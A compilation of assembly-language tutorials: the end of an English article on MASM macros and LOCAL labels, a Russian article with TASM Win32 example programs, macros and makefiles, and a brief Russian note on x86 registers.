00000075  59           1      pop ecx

Now the label names, mPre, mCur, and mL, are not visible. Instead, running the first of mFibonacciByMacro 12, the preprocessor generates three system labels ??0000, ??0001, and ??0002 for mPre, mCur, and mL. And for the second mFibonacciByMacro 13, we can find another three system generated labels ??0003, ??0004, and ??0005 for mPre, mCur, and mL. In this way, MASM resolves the redefinition issue in multiple macro executions. You must declare your labels with the LOCAL directive in a macro.

However, by the name LOCAL, the directive sounds misleading, because the system generated ??0000, ??0001, etc. are not limited to a macro’s context. They are really global in scope. To verify, I purposely initialize mPre and mCur as 2 and 3:

LOCAL mPre, mCur, mL
.data
   mPre DWORD 2
   mCur DWORD 3

Then simply try to retrieve the values from ??0000 and ??0001 even before calling two mFibonacciByMacro in code

mov esi, ??0000
mov edi, ??0001

mFibonacciByMacro 12
mFibonacciByMacro 13

To your surprise probably, when set a breakpoint, you can enter &??0000 into the VS debug Address box as a normal variable. As we can see here, the ??0000 memory address is 0x0116518C with DWORD values 2, 3, and so on. Such a ??0000 is allocated on the data segment together with other properly named variables, as shown string ASCII beside:

o summarize, the LOCAL directive declared in a macro is to prevent data/code labels from being globally redefined.

Further, as an interesting test question, think of the following multiple running of mFibonacciByMacro which is working fine without need of a LOCAL directive in mFibonacciByMacro. Why?

mov ecx, 2
L1:
   mFibonacciByMacro 12
loop L1

Summary

I talked so much about miscellaneous features in assembly language programming. Most of them are from our class teaching and assignment discussion [1]. The basic practices are presented here with short code snippets for better understanding without irrelevant details involved. The main purpose is to show assembly language specific ideas and methods with more strength than other languages.

As noticed, I haven’t given a complete test code that requires a programming environment with input and output. For an easy try, you can go [2] to download the Irvine32 library and setup your MASM programming environment with Visual Studio, while you have to learn a lot in advance to prepare yourself first. For example, the statement exit mentioned here in main is not an element in assembly language, but is defined as INVOKE ExitProcess,0 there.

Assembly language is notable for its one-to-one correspondence between an instruction and its machine code as shown in several listings here. Via assembly code, you can get closer to the heart of the machine, such as registers and memory. Assembly language programming often plays an important role in both academic study and industry development. I hope this article could serve as an useful reference for students and professionals as well.

Assembler & Win32

В отличие от программирования под DOS, где программы написанные на языках высокого уровня (ЯВУ) были мало похожи на свои аналоги, написанные на ассемблере, приложения под Win32 имеют гораздо больше общего. В первую очередь, это связано с тем, что обращение к сервису операционной системы в Windows осуществляется посредством вызова функций, а не прерываний, что было характерно для DOS. Здесь нет передачи параметров в регистрах при обращении к сервисным функциям и, соответственно, нет и множества результирующих значений возвращаемых в регистрах общего назначения и регистре флагов. Следовательно проще запомнить и использовать протоколы вызова функций системного сервиса. С другой стороны, в Win32 нельзя непосредственно работать с аппаратным уровнем, чем \»грешили\» программы для DOS. Вообще написание программ под Win32 стало значительно проще и это обусловлено следующими факторами:

отсутствие startup кода, характерного для приложений и динамических библиотек написанных под Windows 3.x;
гибкая система адресации к памяти: возможность обращаться к памяти через любой регистр общего назначения; \»отсутствие\» сегментных регистров;
доступность больших объёмов виртуальной памяти;
развитый сервис операционной системы, обилие функций, облегчающих разработку приложений;
многообразие и доступность средств создания интерфейса с пользователем (диалоги, меню и т.п.).
Современный ассемблер, к которому относится и TASM 5.0 фирмы Borland International Inc., в свою очередь, развивал средства, которые ранее были характерны только для ЯВУ. К таким средствам можно отнести макроопределение вызова процедур, возможность введения шаблонов процедур (описание прототипов) и даже объектно-ориентированные расширения. Однако, ассемблер сохранил и такой прекрасный инструмент, как макроопределения вводимые пользователем, полноценного аналога которому нет ни в одном ЯВУ.

Все эти факторы позволяют рассматривать ассемблер, как самостоятельный инструмент для написания приложений под платформы Win32 (Windows NT и Windows 95). Как иллюстрацию данного положения, рассмотрим простой пример приложения, работающего с диалоговым окном.

Пример 1. Программа работы с диалогом Файл, содержащий текст приложения, dlg.asm
IDEAL
P586
RADIX 16
MODEL FLAT
%NOINCL
%NOLIST
include \»winconst.inc\» ; API Win32 consts
include \»winptype.inc\» ; API Win32 functions prototype
include \»winprocs.inc\» ; API Win32 function
include \»resource.inc\» ; resource consts
MAX_USER_NAME = 20
DataSeg
szAppName db \’Demo 1\’, 0
szHello db \’Hello, \’
szUser db MAX_USER_NAME dup (0)
CodeSeg
Start: call GetModuleHandleA, 0
call DialogBoxParamA, eax, IDD_DIALOG, 0, offset DlgProc, 0
cmp eax,IDOK
jne bye
call MessageBoxA, 0, offset szHello, \\
offset szAppName, \\
MB_OK or MB_ICONINFORMATION
bye: call ExitProcess, 0
public stdcall DlgProc
proc DlgProc stdcall
arg @@hDlg :dword, @@iMsg :dword, @@wPar :dword, @@lPar :dword
mov eax,[@@iMsg] cmp eax,WM_INITDIALOG
je @@init
cmp eax,WM_COMMAND
jne @@ret_false
mov eax,[@@wPar] cmp eax,IDCANCEL
je @@cancel
cmp eax,IDOK
jne @@ret_false
call GetDlgItemTextA, [@@hDlg[, IDR_NAME, \\
offset szUser, MAX_USER_NAME
mov eax,IDOK
@@cancel: call EndDialog, [@@hDlg[, eax
@@ret_false: xor eax,eax
ret
@@init: call GetDlgItem, [@@hDlg], IDR_NAME
call SetFocus, eax
jmp @@ret_false
endp DlgProc
end Start
Файл ресурсов dlg.rc

#include \»resource.h\»
IDD_DIALOG DIALOGEX 0, 0, 187, 95
STYLE DS_MODALFRAME | DS_3DLOOK | WS_POPUP | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_CLIENTEDGE
CAPTION \»Dialog\»
FONT 8, \»MS Sans Serif\»
BEGIN
DEFPUSHBUTTON \»OK\»,IDOK,134,76,50,14
PUSHBUTTON \»Cancel\»,IDCANCEL,73,76,50,14
LTEXT \»Type your name\»,IDC_STATIC,4,36,52,8
EDITTEXT IDR_NAME,72,32,112,14,ES_AUTOHSCROLL
END
Остальные файлы из данного примера, приведены в приложении 1.

Сразу после метки Start, программа обращается к функции API Win32 GetModuleHandle для получения handle данного модуля (данный параметр чаще именуют как handle of instance). Получив handle, мы вызываем диалог, созданный либо вручную, либо с помощью какой-либо программы построителя ресурсов. Далее программа проверяет результат работы диалогового окна. Если пользователь вышел из диалога посредством нажатия клавиши OK, то приложение запускает MessageBox с текстом приветствия.

Диалоговая процедура обрабатывает следующие сообщения. При инициализации диалога (WM_INITDIALOG) она просит Windows установить фокус на поле ввода имени пользователя. Сообщение WM_COMMAND обрабатывается в таком порядке: делается проверка на код нажатия клавиши. Если была нажата клавиша OK, то пользовательский ввод копируется в переменную szValue, если же была нажата клавиша Cancel, то копирования не производится. Но и в том и другом случае вызывается функция

окончания диалога: EndDialog. Остальные сообщения в группе WM_COMMAND просто игнорируются, предоставляя Windows действовать по умолчанию.

Вы можете сравнить приведённую программу с аналогичной программой, написанной на ЯВУ, разница в написании будет незначительна. Очевидно те, кто писал приложения на ассемблере под Windows 3.x, отметят тот факт, что исчезла необходимость в сложном и громоздком startup коде. Теперь приложение выглядит более просто и естественно.

Пример 2. Динамическая библиотека
Написание динамических библиотек под Win32 также значительно упростилось, по сравнению с тем, как это делалось под Windows 3.x. Исчезла необходимость вставлять startup код, а использование четырёх событий инициализации/деинициализации на уровне процессов и потоков, кажется логичным.

Рассмотрим простой пример динамической библиотеки, в которой всего одна функция, преобразования целого числа в строку в шестнадцатеричной системе счисления. Файл mylib.asm

Ideal
P586
Radix 16
Model flat
DLL_PROCESS_ATTACH = 1

extrn GetVersion: proc

DataSeg
hInst dd 0
OSVer dw 0

CodeSeg
proc libEntry stdcall
arg @@hInst :dword, @@rsn :dword, @@rsrv :dword
cmp [@@rsn],DLL_PROCESS_ATTACH
jne @@1
call GetVersion
mov [OSVer],ax
mov eax,[@@hInst] mov [hInst],eax
@@1: mov eax,1
ret
endP libEntry

public stdcall Hex2Str
proc Hex2Str stdcall
arg @@num :dword, @@str :dword
uses ebx
mov eax,[@@num] mov ebx,[@@str] mov ecx,7
@@1: mov edx,eax
shr eax,4
and edx,0F
cmp edx,0A
jae @@2
add edx,\’0\’
jmp @@3
@@2: add edx,\’A\’ — 0A
@@3: mov [byte ebx + ecx],dl
dec ecx
jns @@1
mov [byte ebx + 8],0
ret
endp Hex2Str

end libEntry
Остальные файлы, которые необходимы для данного примера, можно найти в приложении 2.

Краткие комментарии к динамической библиотеке

Процедура libEntry является точкой входа в динамическую библиотеку, её не надо объявлять как экспортируемую, загрузчик сам определяет её местонахождение. LibEntry может вызываться в четырёх случаях:

при проецировании библиотеки в адресное пространство процесса (DLL_PROCESS_ATTACH);
при первом вызове библиотеки из потока (DLL_THREAD_ATTACH), например, с помощью функции LoadLibrary;
при выгрузке библиотеки потоком (DLL_THREAD_DETACH);
при выгрузке библиотеки из адресного пространства процесса (DLL_PROCESS_DETACH).
В нашем примере обрабатывается только первое из событий DLL_PROCESS_ATTACH. При обработке данного события библиотека запрашивает версию OS сохраняет её, а также свой handle of instance.

Библиотека содержит только одну экспортируемую функцию, которая собственно не требует пояснений. Вы, пожалуй, можете обратить внимание на то, как производится запись преобразованных значений. Интересна система адресации посредством двух регистров общего назначения: ebx + ecx, она позволяет нам использовать регистр ecx одновременно и как счётчик и как составную часть адреса.

Пример 3. Оконное приложение
Файл dmenu.asm

Ideal
P586
Radix 16
Model flat

struc WndClassEx
cbSize dd 0
style dd 0
lpfnWndProc dd 0
cbClsExtra dd 0
cbWndExtra dd 0
hInstance dd 0
hIcon dd 0
hCursor dd 0
hbrBackground dd 0
lpszMenuName dd 0
lpszClassName dd 0
hIconSm dd 0
ends WndClassEx

struc Point
x dd 0
y dd 0
ends Point

struc msgStruc
hwnd dd 0
message dd 0
wParam dd 0
lParam dd 0
time dd 0
pnt Point <>
ends msgStruc

MyMenu = 0065
ID_OPEN = 9C41
ID_SAVE = 9C42
ID_EXIT = 9C43

CS_HREDRAW = 0001
CS_VREDRAW = 0002
IDI_APPLICATION = 7F00
IDC_ARROW = 00007F00
COLOR_WINDOW = 5
WS_EX_WINDOWEDGE = 00000100
WS_EX_CLIENTEDGE = 00000200
WS_EX_OVERLAPPEDWINDOW = WS_EX_WINDOWEDGE OR WS_EX_CLIENTEDGE
WS_OVERLAPPED = 00000000
WS_CAPTION = 00C00000
WS_SYSMENU = 00080000
WS_THICKFRAME = 00040000
WS_MINIMIZEBOX = 00020000
WS_MAXIMIZEBOX = 00010000
WS_OVERLAPPEDWINDOW = WS_OVERLAPPED OR WS_CAPTION OR \\
WS_SYSMENU OR WS_THICKFRAME OR \\
WS_MINIMIZEBOX OR WS_MAXIMIZEBOX
CW_USEDEFAULT = 80000000
SW_SHOW = 5
WM_COMMAND = 0111
WM_DESTROY = 0002
WM_CLOSE = 0010
MB_OK = 0

PROCTYPE ptGetModuleHandle stdcall \\
lpModuleName :dword

PROCTYPE ptLoadIcon stdcall \\
hInstance :dword, \\
lpIconName :dword

PROCTYPE ptLoadCursor stdcall \\
hInstance :dword, \\
lpCursorName :dword

PROCTYPE ptLoadMenu stdcall \\
hInstance :dword, \\
lpMenuName :dword

PROCTYPE ptRegisterClassEx stdcall \\
lpwcx :dword

PROCTYPE ptCreateWindowEx stdcall \\
dwExStyle :dword, \\
lpClassName :dword, \\
lpWindowName :dword, \\
dwStyle :dword, \\
x :dword, \\
y :dword, \\
nWidth :dword, \\
nHeight :dword, \\
hWndParent :dword, \\
hMenu :dword, \\
hInstance :dword, \\
lpParam :dword

PROCTYPE ptShowWindow stdcall \\
hWnd :dword, \\
nCmdShow :dword

PROCTYPE ptUpdateWindow stdcall \\
hWnd :dword

PROCTYPE ptGetMessage stdcall \\
pMsg :dword, \\
hWnd :dword, \\
wMsgFilterMin :dword, \\
wMsgFilterMax :dword

PROCTYPE ptTranslateMessage stdcall \\
lpMsg :dword

PROCTYPE ptDispatchMessage stdcall \\
pmsg :dword

PROCTYPE ptSetMenu stdcall \\
hWnd :dword, \\
hMenu :dword

PROCTYPE ptPostQuitMessage stdcall \\
nExitCode :dword

PROCTYPE ptDefWindowProc stdcall \\
hWnd :dword, \\
Msg :dword, \\
wParam :dword, \\
lParam :dword

PROCTYPE ptSendMessage stdcall \\
hWnd :dword, \\
Msg :dword, \\
wParam :dword, \\
lParam :dword

PROCTYPE ptMessageBox stdcall \\
hWnd :dword, \\
lpText :dword, \\
lpCaption :dword, \\
uType :dword

PROCTYPE ptExitProcess stdcall \\
exitCode :dword

extrn GetModuleHandleA :ptGetModuleHandle
extrn LoadIconA :ptLoadIcon
extrn LoadCursorA :ptLoadCursor
extrn RegisterClassExA :ptRegisterClassEx
extrn LoadMenuA :ptLoadMenu
extrn CreateWindowExA :ptCreateWindowEx
extrn ShowWindow :ptShowWindow
extrn UpdateWindow :ptUpdateWindow
extrn GetMessageA :ptGetMessage
extrn TranslateMessage :ptTranslateMessage
extrn DispatchMessageA :ptDispatchMessage
extrn SetMenu :ptSetMenu
extrn PostQuitMessage :ptPostQuitMessage
extrn DefWindowProcA :ptDefWindowProc
extrn SendMessageA :ptSendMessage
extrn MessageBoxA :ptMessageBox
extrn ExitProcess :ptExitProcess

UDataSeg
hInst dd ?
hWnd dd ?

IFNDEF VER1
hMenu dd ?
ENDIF

DataSeg
msg msgStruc <>
classTitle db \’Menu demo\’, 0
wndTitle db \’Demo program\’, 0
msg_open_txt db \’You selected open\’, 0
msg_open_tlt db \’Open box\’, 0
msg_save_txt db \’You selected save\’, 0
msg_save_tlt db \’Save box\’, 0

CodeSeg
Start: call GetModuleHandleA, 0 ; получаем hInstance
mov [hInst],eax

sub esp,SIZE WndClassEx ; выделяем место в стеке
; заполняем структуру WndClassEx
mov [(WndClassEx esp).cbSize],SIZE WndClassEx
mov [(WndClassEx esp).style],CS_HREDRAW or CS_VREDRAW
mov [(WndClassEx esp).lpfnWndProc],offset WndProc
mov [(WndClassEx esp).cbWndExtra],0
mov [(WndClassEx esp).cbClsExtra],0
mov [(WndClassEx esp).hInstance],eax
call LoadIconA, 0, IDI_APPLICATION
mov [(WndClassEx esp).hIcon],eax
call LoadCursorA, 0, IDC_ARROW
mov [(WndClassEx esp).hCursor],eax
mov [(WndClassEx esp).hbrBackground],COLOR_WINDOW
IFDEF VER1
mov [(WndClassEx esp).lpszMenuName],MyMenu
ELSE
mov [(WndClassEx esp).lpszMenuName],0
ENDIF
mov [(WndClassEx esp).lpszClassName],offset classTitle
mov [(WndClassEx esp).hIconSm],0
call RegisterClassExA, esp ; регистрируем окно

add esp,SIZE WndClassEx ; восстановим стек
; создадим окно

IFNDEF VER2
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \\ extended window style
offset classTitle, \\ pointer to registered class name
offset wndTitle, \\ pointer to window name
WS_OVERLAPPEDWINDOW, \\ window style
CW_USEDEFAULT, \\ horizontal position of window
CW_USEDEFAULT, \\ vertical position of window
CW_USEDEFAULT, \\ window width
CW_USEDEFAULT, \\ window height
0, \\ handle to parent or owner window
0, \\ handle to menu, or child-window
\\ identifier
[hInst], \\ handle to application instance
0 ; pointer to window-creation data
ELSE
call LoadMenu, hInst, MyMenu
mov [hMenu],eax
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \\ extended window style
offset classTitle, \\ pointer to registered class name
offset wndTitle, \\ pointer to window name
WS_OVERLAPPEDWINDOW, \\ window style
CW_USEDEFAULT, \\ horizontal position of window
CW_USEDEFAULT, \\ vertical position of window
CW_USEDEFAULT, \\ window width
CW_USEDEFAULT, \\ window height
0, \\ handle to parent or owner window
eax, \\ handle to menu, or child-window
\\ identifier
[hInst], \\ handle to application instance
0 ; pointer to window-creation data
ENDIF
mov [hWnd],eax
call ShowWindow, eax, SW_SHOW ; show window
call UpdateWindow, [hWnd] ; redraw window

IFDEF VER3
call LoadMenuA, [hInst], MyMenu
mov [hMenu],eax
call SetMenu, [hWnd], eax
ENDIF

msg_loop:
call GetMessageA, offset msg, 0, 0, 0
or ax,ax
jz exit
call TranslateMessage, offset msg
call DispatchMessageA, offset msg
jmp msg_loop
exit: call ExitProcess, 0

public stdcall WndProc
proc WndProc stdcall
arg @@hwnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
mov eax,[@@msg] cmp eax,WM_COMMAND
je @@command
cmp eax,WM_DESTROY
jne @@default
call PostQuitMessage, 0
xor eax,eax
jmp @@ret
@@default:
call DefWindowProcA, [@@hwnd], [@@msg], [@@wPar], [@@lPar] @@ret: ret
@@command:
mov eax,[@@wPar] cmp eax,ID_OPEN
je @@open
cmp eax,ID_SAVE
je @@save
call SendMessageA, [@@hwnd], WM_CLOSE, 0, 0
xor eax,eax
jmp @@ret
@@open: mov eax, offset msg_open_txt
mov edx, offset msg_open_tlt
jmp @@mess
@@save: mov eax, offset msg_save_txt
mov edx, offset msg_save_tlt
@@mess: call MessageBoxA, 0, eax, edx, MB_OK
xor eax,eax
jmp @@ret
endp WndProc
end Start
Комментарии к программе
Здесь мне хотелось в первую очередь продемонстрировать использование прототипов функций API Win32. Конечно их (а также описание констант и структур из API Win32) следует вынести в отдельные подключаемые файлы, поскольку, скорее всего Вы будете использовать их и в других программах. Описание прототипов функций обеспечивает строгий контроль со стороны компилятора за количеством и типом параметров, передаваемых в функции. Это существенно облегчает жизнь программисту, позволяя избежать ошибок времени исполнения, тем более, что число параметров в некоторых функциях API Win32 весьма значительно.

Существо данной программы заключается в демонстрации вариантов работы с оконным меню. Программу можно откомпилировать в трёх вариантах (версиях), указывая компилятору ключи VER2 или VER3 (по умолчанию используется ключ VER1). В первом варианте программы меню определяется на уровне класса окна и все окна данного класса будут иметь аналогичное меню. Во втором варианте, меню определяется при создании окна, как параметр функции CreateWindowEx. Класс окна не имеет меню и в данном случае, каждое окно этого класса может иметь своё собственное меню. Наконец, в третьем варианте, меню загружается после создания окна. Данный вариант показывает, как можно связать меню с уже созданным окном.

Директивы условной компиляции позволяют включить все варианты в текст одной и той же программы. Подобная техника удобна не только для демонстрации, но и для отладки. Например, когда Вам требуется включить в программу новый фрагмент кода, то Вы можете применить данную технику, дабы не потерять функционирующий модуль. Ну, и конечно, применение директив условной компиляции — наиболее удобное средство тестирования различных решений (алгоритмов) на одном модуле.

Представляет определённый интерес использование стековых фреймов и заполнение структур в стеке посредством регистра указателя стека (esp). Именно это продемонстрировано при заполнении структуры WndClassEx. Выделение места в стеке (фрейма) делается простым перемещением esp: sub esp,SIZE WndClassEx

Теперь мы можем обращаться к выделенной памяти используя всё тот же регистр указатель стека. При создании 16-битных приложений такой возможностью мы не обладали. Данный приём можно использовать внутри любой процедуры или даже произвольном месте программы. Накладные расходы на подобное выделение памяти минимальны, однако, следует учитывать, что размер стека ограничен и размещать большие объёмы данных в стеке вряд ли целесообразно. Для этих целей лучше использовать \»кучи\» (heap) или виртуальную память (virtual memory).

Остальная часть программы достаточно тривиальна и не требует каких-либо пояснений. Возможно более интересным покажется тема использования макроопределений.

Макроопределения
Мне достаточно редко приходилось серьёзно заниматься разработкой макроопределений при программировании под DOS. В Win32 ситуация принципиально иная. Здесь грамотно написанные макроопределения способны не только облегчить чтение и восприятие программ, но и реально облегчить жизнь программистов. Дело в том, что в Win32 фрагменты кода часто повторяются, имея при этом не принципиальные отличия. Наиболее показательна, в этом смысле, оконная и/или диалоговая процедура. И в том и другом случае мы определяем вид сообщения и передаём управление тому участку кода, который отвечает за обработку полученного сообщения. Если в программе активно используются диалоговые окна, то аналогичные фрагменты кода сильно перегрузят программу, сделав её малопригодной для восприятия. Применение макроопределений в таких ситуациях более чем оправдано. В качестве основы для макроопределения, занимающегося диспетчеризацией поступаю щих сообщений на обработчиков, может послужить следующее описание.

Пример макроопределений

macro MessageVector message1, message2:REST
IFNB
dd message1
dd offset @@&message1

@@VecCount = @@VecCount + 1
MessageVector message2
ENDIF
endm MessageVector

macro WndMessages VecName, message1, message2:REST
@@VecCount = 0
DataSeg
label @@&VecName dword
MessageVector message1, message2
@@&VecName&Cnt = @@VecCount
CodeSeg
mov ecx,@@&VecName&Cnt

mov eax,[@@msg] @@&VecName&_1: dec ecx
js @@default
cmp eax,[dword ecx * 8 + offset @@&VecName] jne @@&VecName&_1
jmp [dword ecx + offset @@&VecName + 4]

@@default: call DefWindowProcA, [@@hWnd], [@@msg], [@@wPar], [@@lPar] @@ret: ret
@@ret_false: xor eax,eax
jmp @@ret
@@ret_true: mov eax,-1
dec eax
jmp @@ret
endm WndMessage
Комментарии к макроопределениям
При написании процедуры окна Вы можете использовать макроопределение WndMessages, указав в списке параметров те сообщения, обработку которых намерены осуществить. Тогда процедура окна примет вид:

proc WndProc stdcall
arg @@hWnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
WndMessages WndVector, WM_CREATE, WM_SIZE, WM_PAINT, WM_CLOSE, WM_DESTROY

@@WM_CREATE:
; здесь обрабатываем сообщение WM_CREATE
@@WM_SIZE:
; здесь обрабатываем сообщение WM_SIZE
@@WM_PAINT:
; здесь обрабатываем сообщение WM_PAINT
@@WM_CLOSE:
; здесь обрабатываем сообщение WM_CLOSE
@@WM_DESTROY:
; здесь обрабатываем сообщение WM_DESTROY

endp WndProc
Обработку каждого сообщения можно завершить тремя способами:

вернуть значение TRUE, для этого необходимо использовать переход на метку @@ret_true;
вернуть значение FALSE, для этого необходимо использовать переход на метку @@ret_false;
перейти на обработку по умолчанию, для этого необходимо сделать переход на метку @@default.
Отметьте, что все перечисленные метки определены в макро WndMessages и Вам не следует определять их заново в теле процедуры.

Теперь давайте разберёмся, что происходит при вызове макроопределения WndMessages. Вначале производится обнуление счётчика параметров самого макроопределения (число этих параметров может быть произвольным). Теперь в сегменте данных создадим метку с тем именем, которое передано в макроопределение в качестве первого параметра. Имя метки формируется путём конкатенации символов @@ и названия вектора. Достигается это за счёт использования оператора &. Например, если передать имя TestLabel, то название метки примет вид: @@TestLabel. Сразу за объявлением метки вызывается другое макроопределение MessageVector, в которое передаются все остальные параметры, которые должны быть ничем иным, как списком сообщений, подлежащих обработке в процедуре окна. Структура макроопределения MessageVector проста и бесхитростна. Она извлекает первый параметр и в ячейку памяти формата dword заносит код сообщения. В следующую ячейку памяти формата dword записывается а дрес метки обработчика, имя которой формируется по описанному выше правилу. Счётчик сообщений увеличивается на единицу. Далее следует рекурсивный вызов с передачей ещё не зарегистрированных сообщений, и так продолжается до тех пор, пока список сообщений не будет исчерпан.

Сейчас в макроопределении WndMessage можно начинать обработку. Теперь существо обработки скорее всего будет понятно без дополнительных пояснений.

Обработка сообщений в Windows не является линейной, а, как правило, представляет собой иерархию. Например, сообщение WM_COMMAND может заключать в себе множество сообщений поступающих от меню и/или других управляющих элементов. Следовательно, данную методику можно с успехом применить и для других уровней каскада и даже несколько упростить её. Действительно, не в наших силах исправить код сообщений, поступающих в процедуру окна или диалога, но выбор последовательности констант, назначаемых пунктам меню или управляющим элементам (controls) остаётся за нами. В этом случае нет нужды в дополнительном поле, которое сохраняет код сообщения. Тогда каждый элемент вектора будет содержать только адрес обработчика, а найти нужный элемент весьма просто. Из полученной константы, пришедшей в сообщении, вычитается идентификатор первого пункта меню или первого управляющего элемента, это и будет номер нужного элемента вектора. Остаётся только сделать переход на обработчик.

Вообще тема макроопределений весьма поучительна и обширна. Мне редко доводится видеть грамотное использование макросов и это досадно, поскольку с их помощью можно сделать работу в ассемблере значительно проще и приятнее.

Резюме
Для того, чтобы писать полноценные приложения под Win32 требуется не так много:

собственно компилятор и компоновщик (я использую связку TASM32 и TLINK32 из пакета TASM 5.0). Перед использованием рекомендую \»наложить\» patch, на данный пакет. Patch можно взять на site http://www.borland.com/ или на нашем ftp сервере ftp.uralmet.ru.
редактор и компилятор ресурсов (я использую Developer Studio и brcc32.exe);
выполнить перетрансляцию header файлов с описаниями процедур, структур и констант API Win32 из нотации принятой в языке Си, в нотацию выбранного режима ассемблера: Ideal или MASM.
В результате у Вас появится возможность писать лёгкие и изящные приложения под Win32, с помощью которых Вы сможете создавать и визуальные формы, и работать с базами данных, и обслуживать коммуникации, и работать multimedia инструментами. Как и при написании программ под DOS, у Вас сохраняется возможность наиболее полного использования ресурсов процессора, но при этом сложность написания приложений значительно снижается за счёт более мощного сервиса операционной системы, использования более удобной системы адресации и весьма простого оформления программ.

Приложение 1. Файлы, необходимые для первого примера
Файл констант ресурсов resource.inc

IDD_DIALOG = 65 ; 101
IDR_NAME = 3E8 ; 1000
IDC_STATIC = -1
Файл определений dlg.def

NAME TEST
DESCRIPTION \’Demo dialog\’
EXETYPE WINDOWS
EXPORTS DlgProc @1
Файл компиляции makefile

# Make file for Demo dialog
# make -B
# make -B -DDEBUG for debug information

NAME = dlg
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF) $(RES)
tlink32 /Tpe /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF), $(RES)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMOPT) $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC
Файл заголовков resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by dlg.rc
//
#define IDD_DIALOG 101
#define IDR_NAME 1000
#define IDC_STATIC -1

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
Приложение 2. Файлы, необходимые для второго примера
Файл описания mylib.def

LIBRARY MYLIB
DESCRIPTION \’DLL EXAMPLE, 1997\’
EXPORTS Hex2Str @1
Файл компиляции makefile

# Make file for Demo DLL
# make -B
# make -B -DDEBUG for debug information

NAME = mylib
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF)
tlink32 /Tpd /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMOPT) $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC
Приложение 3. Файлы, необходимые для третьего примера
Файл описания dmenu.def

NAME TEST
DESCRIPTION \’Demo menu\’
EXETYPE WINDOWS
EXPORTS WndProc @1
Файл ресурсов dmenu.rc

#include \»resource.h\»
MyMenu MENU DISCARDABLE
BEGIN POPUP \»Files\»
BEGIN
MENUITEM \»Open\», ID_OPEN
MENUITEM \»Save\», ID_SAVE
MENUITEM SEPARATOR
MENUITEM \»Exit\», ID_EXIT
END
MENUITEM \»Other\», 65535
END
Файл заголовков resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by dmenu.rc
//
#define MyMenu 101
#define ID_OPEN 40001
#define ID_SAVE 40002
#define ID_EXIT 40003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40004
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
Файл компиляции makefile

# Make file for Turbo Assembler Demo menu
# make -B
# make -B -DDEBUG -DVERN for debug information and version
NAME = dmenu
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res
!if $d(DEBUG)TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(VER2)
TASMVER=/dVER2
!elseif $d(VER3)
TASMVER=/dVER3
!else
TASMVER=/dVER1
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF) $(RES)
tlink32 /Tpe /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF), $(RES)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMVER) /m /mx /z /zd $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC

О регистрах в assembler

Регистр — это определенный участок памяти внутри самого процессора, от 8-ми до 32-х бит длиной, который используется для промежуточного хранения информации, обрабатываемой процессором. Некоторые регистры содержат только определенную информацию.
Регистры общего назначения — EAX, EBX, ECX, EDX. Они 32-х битные и делятся еще на две части, нижние из которых AX, BX, CD, DX — 16-ти битные, и деляется еще на два 8-ми битных регистра. Так, АХ делится на AH и AL, DX на DH и DL и т.д. Буква \»Н\» означает верхний регистр.

Так, AH и AL каждый по одному байту, АХ — 2 байта (или word — слово), ЕАХ — 4 байта (или dword — двойное слово). Эти регистры используются для операций с данными, такими, как сравнение, математические операции или запись данных в память.

Регистр СХ чаще всего используется как счетчик в циклах.

АН в DOS программах используется как определитель, какой сервис будет использоваться при вызове INT.

Регистры сегментов — это CS, DS, ES, FS, GS, SS. Эти регистры 16-ти битные, и содержат в себе первую половину адреса \»оффсет:сегмент\».

CS — сегмент кода (страница памяти) исполняемой в данный момент программы.
DS — сегмент (страница) данных исполняемой программы, т.е. константы, строковые ссылки и т.д.
SS — сегмент стека исполняемой программы.
ES, FS, GS — дополнительные сегменты, и могут не использоваться программой.
